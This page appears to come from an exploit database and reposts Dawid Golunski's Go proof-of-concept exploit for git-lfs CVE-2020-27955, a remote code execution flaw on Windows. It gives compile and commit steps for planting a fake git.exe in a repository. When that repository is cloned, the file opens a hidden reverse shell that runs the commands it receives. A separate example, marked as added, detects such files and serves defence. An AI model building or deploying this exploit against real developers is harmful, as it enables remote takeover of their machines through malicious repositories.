git-lfs Remote Code Execution Exploit

Date: 08 Nov 2020
Reported by: Dawid Golunski
Type: zdt
Source: 0day.today

Git-lfs RCE exploit affecting the Windows dev world that uses git. The payload executes automatically on a git clone operation, spawning a reverse shell, or calc.exe for testing. Requires an lfs-enabled repository with lfs files.

Code
/*
   Go PoC exploit for git-lfs - Remote Code Execution (RCE) vulnerability CVE-2020-27955
   git-lfs-RCE-exploit-CVE-2020-27955.go

   Discovered by Dawid Golunski
   https://legalhackers.com
   https://exploitbox.io


   Affected (RCE exploit):
   Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken / SmartGit / SourceTree etc.
   Basically the whole Windows dev world which uses git.

   Usage:
   Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go
   Save & commit as git.exe

   The payload should get executed automatically on git clone operation.
   It spawns a reverse shell, or a calc.exe for testing (if it couldn't connect).

   An lfs-enabled repository with lfs files may also be needed so that git-lfs
   gets invoked. This can be achieved with:

   git lfs track "*.dat"
   echo "fat bug file" > lfsdata.dat
   git add .*
   git add *
   git commit -m 'git-lfs exploit' -a

   Check out the full advisory for details:

   https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html

   https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html

   PoC video at:
   https://youtu.be/tlptOf9w274

 ** For testing purposes only **


*/

package main

import (
    "net"
    "os/exec"
    "bufio"
    "syscall"
)


func revsh(host string) {

    c, err := net.Dial("tcp", host)
    if nil != err {
        // Conn failed
        if nil != c {
            c.Close()
        }
        // Calc for testing purposes if no listener available
        cmd := exec.Command("calc")
        cmd.Run()
        return
    }

    r := bufio.NewReader(c)
    for {
        runcmd, err := r.ReadString('\n')
        if nil != err {
            c.Close()
            return
        }
        cmd := exec.Command("cmd", "/C", runcmd)
        cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
        out, _ := cmd.CombinedOutput()
        c.Write(out)
    }
}

// Connect to netcat listener on local port 1337
func main() {
    revsh("localhost:1337")
}


-- 
Regards,
Dawid Golunski
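
A defensive check for the condition the usage notes above describe (a file committed as git.exe so that it runs on clone), added here as an example and not part of the original advisory or PoC: it flags tracked paths named "git" with an executable extension. The function names, the extension list beyond .exe, and the sample listing are assumptions.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// Extensions Windows may run when a bare command name is resolved.
// Assumption: the list mirrors common PATHEXT entries; the page itself
// only names git.exe.
var execExts = map[string]bool{".exe": true, ".bat": true, ".cmd": true, ".com": true}

// ShadowsGit reports whether a repository path is a file that a bare "git"
// lookup could resolve to. Windows file names are case-insensitive, so the
// comparison is done in lower case. Matches anywhere in the tree are
// reported, which is deliberately conservative.
func ShadowsGit(repoPath string) bool {
	name := strings.ToLower(path.Base(strings.ReplaceAll(repoPath, "\\", "/")))
	ext := path.Ext(name)
	return execExts[ext] && strings.TrimSuffix(name, ext) == "git"
}

// Suspicious filters a tracked-file listing, for example the output of
// `git ls-tree -r --name-only HEAD` split into one path per element.
func Suspicious(paths []string) []string {
	var hits []string
	for _, p := range paths {
		if ShadowsGit(p) {
			hits = append(hits, p)
		}
	}
	return hits
}

func main() {
	// Constructed sample listing, not taken from a real repository.
	sample := []string{".gitattributes", "lfsdata.dat", "git.exe",
		"tools/Git.CMD", "docs/git.md", "legit.exe"}
	for _, p := range Suspicious(sample) {
		fmt.Println("review before cloning on Windows:", p)
	}
}
```

The same predicate can run in a server-side hook or CI job to reject pushes that add such a file.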

Vulners AI Score: 0.4 (Low risk)
CVSS 3.1: 9.8
CVSS 2: 10
EPSS: 0.92929